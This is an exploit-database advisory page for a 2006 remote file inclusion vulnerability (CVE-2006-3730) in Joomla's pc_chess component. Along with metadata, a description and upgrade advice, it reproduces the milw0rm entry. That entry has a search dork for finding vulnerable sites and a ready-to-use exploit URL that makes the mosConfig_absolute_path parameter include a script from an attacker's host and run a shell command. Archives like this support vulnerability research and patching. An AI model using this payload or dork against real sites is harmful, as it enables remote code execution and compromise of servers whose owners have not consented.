header-logo
Suggest Exploit
vendor:
Joomla
by:
milw0rm
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Joomla
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: CVE-2006-3730
CPE: o:joomla:joomla
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2006

pc_chess Component

The vulnerability is caused due to the 'mosConfig_absolute_path' parameter in the 'include.pcchess.php' script not being properly sanitized before being used to include a file. This can be exploited to include arbitrary local or remote files, which can be used to execute arbitrary PHP code.

Mitigation:

Upgrade to the latest version of the component.
Source

Exploit-DB raw data:

# pc_chess Component

- dork : index.php?option=com_pcchess

- exploit :

http://[target]/[path]/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://[attacker]/cmd.txt?&cmd=ls 

# milw0rm.com [2006-07-24]

Navigation

Suggest Exploit

Services By CQR